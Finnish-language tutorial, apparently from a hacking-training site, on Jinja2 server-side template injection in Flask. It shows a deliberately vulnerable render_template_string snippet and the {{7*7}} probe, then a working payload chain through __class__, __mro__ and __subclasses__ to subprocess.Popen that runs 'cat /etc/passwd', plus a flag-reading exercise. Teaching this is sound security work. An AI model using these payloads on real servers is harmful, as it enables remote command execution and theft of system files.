Python Jinja2 on mallinnusmoottori, joka mahdollistaa Python-koodin käytön HTML-templaattien luomiseen. Jinja2:ta käytetään usein yhdessä Python-webikehyksien, kuten Flaskin, kanssa, mutta sitä voidaan käyttää myös itsenäisesti.

Jinja2:n käyttö HTML-templaattien luomiseen on melko yksinkertaista. Voit esimerkiksi luoda Jinja2-mallin, jossa voit käyttää muuttujia, ehtolauseita ja silmukoita. Alla on muutama esimerkki:

Tämä malli asettaa muuttujan nimi arvoksi "Matti" ja tulostaa sitten HTML-tunnisteeseen <p> tervehdyksen "Tervehdys, Matti!".

Tämä malli tarkastaa onko ikä-muuttujan arvo suurempi tai yhtäkuin 18 ja tulostaa "Olet täysi-ikäinen" tai "Olet alaikäinen" sen mukaan.

Tämä malli luo luettelon <ul>-tunnisteeseen, jossa jokainen listan elementti (<li>) sisältää tuotteen nimen ja hinnan. Tämä malli käyttää for-silmukkaa käydäkseen läpi listan tuotteet.

Nämä ovat vain muutamia esimerkkejä Jinja2:n käytöstä. Jinja2:ta voidaan käyttää monin eri tavoin ja sillä on paljon ominaisuuksia, jotka tekevät HTML-templaattien luomisesta joustavaa ja tehokasta.

Jinjaa, kuten muitakin templaattimoottoreita voi käyttää virheellisesti ja aiheuttaa sovellukseen karmivan tietoturva-aukon.

Tässä on esimerkki haavoittuvasta Flask-sovelluksesta joka käyttää Jinja2-templaattimoottoria virheellisesti, antaen käyttäjän syötteen vaikuttaa itse templaattiin, eikä vain templaatille annettavaan dataan kuten olisi pitänyt.

Jinjaan kelpaa perinteinen tapa havaita templaatti-injektioita, eli siis syöttää

syötteessä ja katsoa että palauttaako sovellus HTML:ssä "49" samalla kohdalla. Tämä on lähes varma merkki templaatti-injektiosta.

Oletetaan, että haluat vaikkapa suorittaa käyttöjärjestelmäkomentoja lukeaksesi tiedoston /etc/passwd palvelimen levyltä. Tällöin haluaisit ujuttaa templaattiin seuraavan koodin: 

 mahdollistaa käyttöjärjestelmäkomennon ajamisen komentotulkissa, ja 

Jinja2 ei kuitenkaan tue tällaista syntaksia. Jinja2 templaatissa voi kyllä kutsua funktiota, mutta funktion pitää olla jo ladattuna sovelluksen muistiin, ja importtia et voi käyttää.

Voit kuitenkin yrittää löytää sovelluksen muistista luokan joka sopii tarkoituksiisi ja kutsua sitä. Käytännössä tämä onnistuu näppärästi listaamalla kaikki muistiin ladatut 

object-tyypin hakeminen __class__ ja __mro__ avulla

Ihan ensimmäisenä sinun pitää päästä käsiksi object-tyyppiin. Tämä ei onnistu jinjassa suoraan, esimerkiksi tämä aiheuttaisi virheen jinjassa: 

Vaikka normaalissa Python-kontekstissa object.__name__ tulostaisi 'object'.

-tyypin käsisi minkä tahansa muuttujan kautta, sen 

Pythonin moduulien hakujärjestys määrittää, miten Python löytää ja lataa moduuleja, kun niitä tuodaan toiseen moduuliin. 

 on attribuutti, joka löytyy Pythonin kaikilta luokilta ja joka sisältää luokan määrittämän perintöjärjestyksen. 

-attribuutti on kätevä työkalu monimutkaisten perintörakenteiden tutkimiseen ja ymmärtämiseen, ja sitäkin ketävempi templaatti injektioissa.

Esimerkiksi, Pythonin merkkijono (str) polveutuu objektista (object), joten str.__mro__ palauttaa listan (str, object).

Toisin sanoen seuraavat kaksi koodia tekevät saman asian: 

Mutta Jinja-kontekstissa emme voi käyttää myöskään str-tyyppiä suoraan, sekin pitää hakea. Sen taas voimme hakea luomalla merkkijonon ja kutsumalla sen 

Sopivan luokan etsiminen __subclasses__ avulla

 taas on Pythonin kaikilla luokilla oleva funktio, joka palauttaa kaikki luokan välittömät alaluokat listana. 

Luokkia tulee ylenensä aika paljon, kannattaa kopioida ne vaikka tekstiedotoriin ja etsiä luokkien seasta sopiva. Tässä tapauksessa mielenkiintoinen on 

 joka on juuri se tyyppi joka me haluttiinkin käyttöjärjestelmäkomentojen suorittamiseksi.

Seuraava vaihe on selvittää luokan indeksi, eli kuinka mones luokka haluamasi luokka on. Se pitää nimittäin hakea numerolla. Voisit kopioida koko rimpsun tekstieeditoriin ja selvittää monesko listalla "subprocess.Popen" on, mutta se on paitsi hieman hitaanpuoleista, myös virhealtista.

Tyylikkäämpää on käyttää Jinja2-templaattimoottoria rakentamaan näkymä sinulle.

Koodi voi näyttää vähän kryptiseltä jos et ole tuttu JInjan kanssa, mutta käytännössä kyseessä on for-looppi joka käy läpi kaikki luokat ja tulostaa sekä luokan järjestysnumeron, moduulin, että luokan nimen paragrafin (<p>) sisällä sivulle.

Numero on siis 6. Muista että tämä vaihtelee sovelluksittain, joten on tärkeää että ymmärrät konseptin ja että osaat etsiä sopivan luokan ja oikean indeksin itsellesi sovelluksesta kuin sovelluksesta.

Jep! Oikea indeksi. Nyt pääsemme käsiksi subprocess.Popen luokkaan. Tästä on enää lyhyt matka voittoon.

Kokeile seuraavaksi hyökkäystä itse! Kaksi vinkkiä: 

Tästä sovelluksesta löytyy myös subprocess.Popen

Indeksi ei ole 6, vaan aika paljonkin suurempi.

Lue lippu tiedostosta /usr/src/app/flag.txt

Jinja2 Templaatti-Injektio

Jinja2 on itsessään turvallinen ja mainio vaihtoehto vanhanaikaiselle HTML-rakentamiselle. Mutta templaatti täytyy pitää staattisena, mieluiten ihan omassa tiedostossaan josta se ladataan. Vain templaatin data saa vaihtua koodin suorituksen aikana, ei templaatin rakenne.

Jinja2 turvallinen käyttö

## Jinja2

Python Jinja2 on mallinnusmoottori, joka mahdollistaa Python-koodin käytön HTML-templaattien luomiseen. Jinja2:ta käytetään usein yhdessä Python-webikehyksien, kuten Flaskin, kanssa, mutta sitä voidaan käyttää myös itsenäisesti.

Jinja2:n käyttö HTML-templaattien luomiseen on melko yksinkertaista. Voit esimerkiksi luoda Jinja2-mallin, jossa voit käyttää muuttujia, ehtolauseita ja silmukoita. Alla on muutama esimerkki:

### Muuttujien käyttö

```python
{% set nimi = "Matti" %}

<p>Tervehdys, {{ nimi }}!</p>
```

Tämä malli asettaa muuttujan nimi arvoksi "Matti" ja tulostaa sitten HTML-tunnisteeseen <p> tervehdyksen "Tervehdys, Matti!".

### 
Ehtolauseiden käyttö

```python
{% if ika >= 18 %}

<p>Olet täysi-ikäinen!</p>
{% else %}
<p>Olet alaikäinen.</p>
{% endif %}
```

Tämä malli tarkastaa onko ikä-muuttujan arvo suurempi tai yhtäkuin 18 ja tulostaa "Olet täysi-ikäinen" tai "Olet alaikäinen" sen mukaan.

### Silmukoiden käyttö

```python
<ul>
{% for tuote in tuotteet %}
  <li>{{ tuote.nimi }} - {{ tuote.hinta }}€</li>
{% endfor %}
</ul>
```

Tämä malli luo luettelon <ul>-tunnisteeseen, jossa jokainen listan elementti (<li>) sisältää tuotteen nimen ja hinnan. Tämä malli käyttää for-silmukkaa käydäkseen läpi listan tuotteet.

Nämä ovat vain muutamia esimerkkejä Jinja2:n käytöstä. Jinja2:ta voidaan käyttää monin eri tavoin ja sillä on paljon ominaisuuksia, jotka tekevät HTML-templaattien luomisesta joustavaa ja tehokasta.

---

## Injektio

Jinjaa, kuten muitakin templaattimoottoreita voi käyttää virheellisesti ja aiheuttaa sovellukseen karmivan tietoturva-aukon.

Tässä on esimerkki haavoittuvasta Flask-sovelluksesta joka käyttää Jinja2-templaattimoottoria virheellisesti, antaen käyttäjän syötteen vaikuttaa itse templaattiin, eikä vain templaatille annettavaan dataan kuten olisi pitänyt.

```python
if request.method == 'POST':
        name = request.form['name']
        template = f'<h1>Tervetuloa, { name }!</h1>'
        return render_template_string(template)
    else:
        template = '''
            <form method="POST">
                <label for="name">Nimi:</label>
                <input type="text" name="name" id="name">
                <button type="submit">Lähetä</button>
            </form>
        '''
        return render_template_string(template)
```

---

## Haavoittuvuuden havaitseminen

Jinjaan kelpaa perinteinen tapa havaita templaatti-injektioita, eli siis syöttää** \{\{7\*7\}\} **syötteessä ja katsoa että palauttaako sovellus HTML:ssä "49" samalla kohdalla. Tämä on lähes varma merkki templaatti-injektiosta.

Kokeillaan: 

![](sanity:image-08fa81f97b9e63f041ac526385687250f51e7048-912x130-png)

![](sanity:image-a9c8ea783af19b2abaca7011b39cc63dc81a7f2c-1058x196-png)

Kyllä, sovellus on haavoittuva.

---

## Haavoittuvuuden hyväksikäyttö

Oletetaan, että haluat vaikkapa suorittaa käyttöjärjestelmäkomentoja lukeaksesi tiedoston /etc/passwd palvelimen levyltä. Tällöin haluaisit ujuttaa templaattiin seuraavan koodin: 

```python
import subprocess; subprocess.Popen("cat /etc/passwd",shell=True,stdout=-1).communicate()
```

(Jos ihmettelet, niin **shell=True** mahdollistaa käyttöjärjestelmäkomennon ajamisen komentotulkissa, ja **stdout=-1** tarkoittaa **stdout=subprocess.PIPE** josta voit lukea halutessasi lisää [tästä](https://docs.python.org/3/library/subprocess.html#subprocess.PIPE)).

Jinja2 ei kuitenkaan tue tällaista syntaksia. Jinja2 templaatissa voi kyllä kutsua funktiota, mutta funktion pitää olla jo ladattuna sovelluksen muistiin, ja importtia et voi käyttää.

Voit kuitenkin yrittää löytää sovelluksen muistista luokan joka sopii tarkoituksiisi ja kutsua sitä. Käytännössä tämä onnistuu näppärästi listaamalla kaikki muistiin ladatut **object**-luokan aliluokat. Tämä taas onnistuu ** \_\_class\_\_**, **\_\_mro\_\_** ja **\_\_subclasses\_\_** attribuuteilla.

---

## object-tyypin hakeminen \_\_class\_\_ ja \_\_mro\_\_ avulla

Ihan ensimmäisenä sinun pitää päästä käsiksi object-tyyppiin. Tämä ei onnistu jinjassa suoraan, esimerkiksi tämä aiheuttaisi virheen jinjassa: 

```python
{{object.__name__}}
```

Vaikka normaalissa Python-kontekstissa object.\_\_name\_\_ tulostaisi 'object'.

```python
>>> object.__name__
'object'
```

Voit kuitenkin hakea **object**-tyypin käsisi minkä tahansa muuttujan kautta, sen **\_\_mro\_\_ **attribuutin kautta.

Pythonin moduulien hakujärjestys määrittää, miten Python löytää ja lataa moduuleja, kun niitä tuodaan toiseen moduuliin. 

**\_\_mro\_\_** on attribuutti, joka löytyy Pythonin kaikilta luokilta ja joka sisältää luokan määrittämän perintöjärjestyksen. **\_\_mro\_\_**-attribuutti on kätevä työkalu monimutkaisten perintörakenteiden tutkimiseen ja ymmärtämiseen, ja sitäkin ketävempi templaatti injektioissa.

Esimerkiksi, Pythonin merkkijono (str) polveutuu objektista (object), joten str.\_\_mro\_\_ palauttaa listan (str, object).

```python
>>> str.__mro__
(<class 'str'>, <class 'object'>)
```

Toisin sanoen seuraavat kaksi koodia tekevät saman asian: 

```python
>>> object.__name__
'object'
```

```python
>>> str.__mro__[1].__name__
'object
```

Mutta Jinja-kontekstissa emme voi käyttää myöskään str-tyyppiä suoraan, sekin pitää hakea. Sen taas voimme hakea luomalla merkkijonon ja kutsumalla sen **\_\_class\_\_** attribuuttia.

```python
>>> 'moi'.__class__
<class 'str'>
```

Yhdistämällä molemmat (**\_\_class\_\_** ja **\_\_mro\_\_** attribuutit) saamme haettua **object**-tyypin Jinjan kelpuuttamalla tavalla.

```python
>>> ''.__class__.__mro__[1]
<class 'object'
```

![](sanity:image-62cf92609b01ccb1f6a05ede7325e4d045d8e2d4-846x120-png)

---

## Sopivan luokan etsiminen \_\_subclasses\_\_ avulla

**\_\_subclasses\_\_** taas on Pythonin kaikilla luokilla oleva funktio, joka palauttaa kaikki luokan välittömät alaluokat listana. 

```python
''.__class__.__mro__[1].__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>...<class 'subprocess.Popen'>...
```

Luokkia tulee ylenensä aika paljon, kannattaa kopioida ne vaikka tekstiedotoriin ja etsiä luokkien seasta sopiva. Tässä tapauksessa mielenkiintoinen on **<class 'subprocess.Popen'>** joka on juuri se tyyppi joka me haluttiinkin käyttöjärjestelmäkomentojen suorittamiseksi.

Seuraava vaihe on selvittää luokan indeksi, eli kuinka mones luokka haluamasi luokka on. Se pitää nimittäin hakea numerolla. Voisit kopioida koko rimpsun tekstieeditoriin ja selvittää monesko listalla "subprocess.Popen" on, mutta se on paitsi hieman hitaanpuoleista, myös virhealtista.

Tyylikkäämpää on käyttää Jinja2-templaattimoottoria rakentamaan näkymä sinulle.

```python
{% set classes=''.__class__.__mro__[1].__subclasses__() %}{%for c in classes %}<p>{{loop.index-1}} - {{c.__module__}}.{{ c.__name__ }}</p>{% endfor %}
```

Koodi voi näyttää vähän kryptiseltä jos et ole tuttu JInjan kanssa, mutta käytännössä kyseessä on for-looppi joka käy läpi kaikki luokat ja tulostaa sekä luokan järjestysnumeron, moduulin, että luokan nimen paragrafin (<p>) sisällä sivulle.

![](sanity:image-5436f511e1a09fa4d9b5bf893b1c3d507153e761-792x488-png)

Numero on siis 6. Muista että tämä vaihtelee sovelluksittain, joten on tärkeää että ymmärrät konseptin ja että osaat etsiä sopivan luokan ja oikean indeksin itsellesi sovelluksesta kuin sovelluksesta.

Voimme varmistua tästä: 

```python
{{''.__class__.__mro__[1].__subclasses__()[6]}}
```

![](sanity:image-66ed89160c0993a22ec2775b993e92b7b3c41372-1132x128-png)

Jep! Oikea indeksi. Nyt pääsemme käsiksi subprocess.Popen luokkaan. Tästä on enää lyhyt matka voittoon.

```python
{{''.__class__.__mro__[1].__subclasses__()[6]('cat /etc/passwd',shell=True,stdout=-1).communicate()}}
```

![](sanity:image-590df9c154b106c3b0f4267e153c5b6058a11e3f-1192x454-png)

---

## Harjoitus

Kokeile seuraavaksi hyökkäystä itse! Kaksi vinkkiä: 

- Tästä sovelluksesta löytyy myös subprocess.Popen
- Indeksi ei ole 6, vaan aika paljonkin suurempi.

@exercise b5e15686db1a

@embed 85b28eb4e749


Python Jinja2 Templaatti-Injektiot

HTML:ää rakennetaan tyypillisesti templaateilla juuri injektiohaavoittuvuuksien välttämiseksi, mutta joskus käy niin kurjasti että injektio osuukin itse templaattiin, ja tällöin seuraukset ovat vakavat.

Python Jinja2 Templaatti-Injektiot

Jinja2

Muuttujien käyttö

Silmukoiden käyttö

Hakkeroinnin oppiminen alkaa tästä